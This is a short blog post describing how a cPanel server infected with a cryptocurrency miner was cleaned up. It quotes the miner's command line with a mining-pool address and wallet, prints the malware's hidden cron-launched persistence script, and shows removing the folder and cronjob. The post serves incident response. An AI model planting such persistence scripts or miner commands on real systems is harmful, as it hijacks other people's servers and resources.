Home » Linux tips » 12 March 2019 » 1,520 supporters » 2 Comments »

Cpanel server infected with mining software

12 March 2019 1,520 supporters 2 Comments

Recently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.

Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

Using ‘Process Manager’ to kill the pid who is running the process.

I have check in the user Cpanel and found strange cronjob point to strange path eg :

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the content of the file using cat command:

[[email protected] ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Go to the folder contents and see what is inside the folder:

[[email protected] ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[[email protected] .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirm that the mining come from that path.

Delete the folder and delete the cronjob so the mining stop.

[[email protected] .qts]# cd ..
[[email protected] includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’




2 Comments »

  • admin (author) said:

    Outdated script…

  • kumail said:

    Do you have any idea of how they infected the server in the first place? how did they upload the bash.pid file onto the server?

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.